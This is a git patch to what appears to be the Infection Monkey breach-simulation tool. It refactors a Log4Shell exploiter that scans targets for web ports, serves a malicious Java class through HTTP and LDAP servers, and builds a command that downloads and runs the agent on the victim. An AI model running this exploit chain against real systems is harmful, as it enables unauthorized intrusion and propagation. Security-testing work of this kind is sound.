From 031cafbe120456328f803456a4180004b8701709 Mon Sep 17 00:00:00 2001
From: Mike Salvatore <mike.s.salvatore@gmail.com>
Date: Wed, 2 Mar 2022 14:23:34 -0500
Subject: [PATCH] Agent: Refactor Log4ShellExploiter to work with Puppet

---
 monkey/infection_monkey/exploit/log4shell.py | 58 +++++++++-----------
 1 file changed, 26 insertions(+), 32 deletions(-)

diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index b917099e7..bfc0b4b46 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -13,18 +13,13 @@ from infection_monkey.exploit.log4shell_utils import (
 from infection_monkey.exploit.tools.helpers import get_monkey_depth
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.i_puppet.i_puppet import ExploiterResultData
 from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
-from infection_monkey.model import (
-    DROPPER_ARG,
-    LOG4SHELL_LINUX_COMMAND,
-    LOG4SHELL_WINDOWS_COMMAND,
-    VictimHost,
-)
+from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
 from infection_monkey.network.info import get_free_tcp_port
 from infection_monkey.network.tools import get_interface_to_target
 from infection_monkey.utils.commands import build_monkey_commandline
 from infection_monkey.utils.monkey_dir import get_monkey_dir_path
-from monkey.infection_monkey.i_puppet.i_puppet import ExploiterResultData
 
 logger = logging.getLogger(__name__)
 
@@ -38,9 +33,24 @@ class Log4ShellExploiter(WebRCE):
         5  # Max time agent will wait for the response from victim in SECONDS
     )
 
-    def __init__(self, host: VictimHost):
-        super().__init__(host)
+    def _exploit_host(self) -> ExploiterResultData:
+        self._open_ports = [
+            int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
+        ]
 
+        if not self._open_ports:
+            logger.info("Could not find any open web ports to exploit")
+            return self.exploit_result
+
+        self._configure_servers()
+        self._start_servers()
+        try:
+            self.exploit(None, None)
+            return self.exploit_result
+        finally:
+            self._stop_servers()
+
+    def _configure_servers(self):
         self._ldap_port = get_free_tcp_port()
 
         self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
@@ -49,29 +59,15 @@ class Log4ShellExploiter(WebRCE):
         self._ldap_server = None
         self._exploit_class_http_server = None
         self._agent_http_server_thread = None
-        self._open_ports = [
-            int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
-        ]
-
-    def _exploit_host(self) -> ExploiterResultData:
-        if not self._open_ports:
-            logger.info("Could not find any open web ports to exploit")
-            return self.exploit_result
-
-        self._start_servers()
-        try:
-            self.exploit(None, None)
-            return self.exploit_result
-        finally:
-            self._stop_servers()
 
     def _start_servers(self):
+        dropper_target_path = self.monkey_target_paths[self.host.os["type"]]
+
         # Start http server, to serve agent to victims
-        paths = self.get_monkey_paths()
-        agent_http_path = self._start_agent_http_server(paths)
+        agent_http_path = self._start_agent_http_server(dropper_target_path)
 
         # Build agent execution command
-        command = self._build_command(paths["dest_path"], agent_http_path)
+        command = self._build_command(dropper_target_path, agent_http_path)
 
         # Start http server to serve malicious java class to victim
         self._start_class_http_server(command)
@@ -79,10 +75,10 @@ class Log4ShellExploiter(WebRCE):
         # Start ldap server to redirect ldap query to java class server
         self._start_ldap_server()
 
-    def _start_agent_http_server(self, agent_paths: dict) -> str:
+    def _start_agent_http_server(self, dropper_target_path) -> str:
         # Create server for http download and wait for it's startup.
         http_path, http_thread = HTTPTools.try_create_locked_transfer(
-            self.host, agent_paths["src_path"]
+            self.host, dropper_target_path, self.agent_repository
         )
         self._agent_http_server_thread = http_thread
         return http_path
@@ -118,9 +114,7 @@ class Log4ShellExploiter(WebRCE):
 
     def _build_command(self, path, http_path) -> str:
         # Build command to execute
-        monkey_cmd = build_monkey_commandline(
-            self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
-        )
+        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, location=path)
         if "linux" in self.host.os["type"]:
             base_command = LOG4SHELL_LINUX_COMMAND
         else: